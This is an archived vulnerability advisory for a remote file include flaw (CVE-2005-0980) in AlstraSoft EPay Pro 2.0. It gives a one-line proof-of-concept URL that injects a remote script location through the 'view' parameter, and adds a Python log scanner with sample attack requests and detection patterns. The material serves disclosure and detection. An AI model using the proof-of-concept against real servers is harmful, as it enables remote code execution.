AlstraSoft EPay Pro Remote File Include Vulnerability
BID:12973
Info
| Bugtraq ID: | 12973 |
| Class: | Input Validation Error |
| CVE: | CVE-2005-0980 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 01 2005 12:00AM |
| Updated: | Jul 12 2009 11:56AM |
| Credit: | Discovery is credited to Diabolic Crab dcrab <[email protected]>. |
| Vulnerable: | AlstraSoft EPay Pro 2.0 |
| Not Vulnerable: | |
Discussion
EPay Pro is reported prone to a remote file include vulnerability.
The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'view' parameter.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer.
EPay Pro version 2.0 is vulnerable to this issue.
Exploit / POC
An exploit is not required.
Proof of concept example is available:
http://www.example.com/epal/index.php?view=http://www.example.com/
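To find requests of this shape in web server access logs, the following added example (not part of the advisory and not vendor code) flags any request whose 'view' parameter decodes to a remote location. It assumes Common/Combined Log Format; the log lines, client addresses and the benign value `account` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field of a Common/Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Value that names a remote resource: scheme://..., data:..., or //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|data:|//)', re.I)

def fully_decode(value, rounds=3):
    """Undo leftover percent-encoding; bounded so a crafted value cannot loop."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_view(line, param="view"):
    """Return the decoded 'view' value if it names a remote resource, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        value = fully_decode(value)  # parse_qs has already decoded once
        if REMOTE_RE.match(value):
            return value
    return None

def scan(lines):
    """Return (line_number, client_ip, value) for every flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_view(line)
        if value is not None:
            hits.append((n, line.split(" ", 1)[0], value))
    return hits

# Constructed sample log lines (documentation addresses, made-up sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Apr/2005:10:00:00 +0000] "GET /epal/index.php?view=account HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Apr/2005:10:00:05 +0000] "GET /epal/index.php?view=http://www.example.com/ HTTP/1.1" 200 734',
    '192.0.2.44 - - [01/Apr/2005:10:00:09 +0000] "GET /epal/index.php?view=http%3A%2F%2Fwww.example.com%2F HTTP/1.1" 200 734',
    '192.0.2.77 - - [01/Apr/2005:10:01:00 +0000] "GET /epal/index.php?page=2&ref=http://www.example.org/ HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for n, ip, value in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} requested view={value}")
```

Only the second and third sample lines are reported; a URL in any other parameter, as in the fourth line, is ignored.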
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].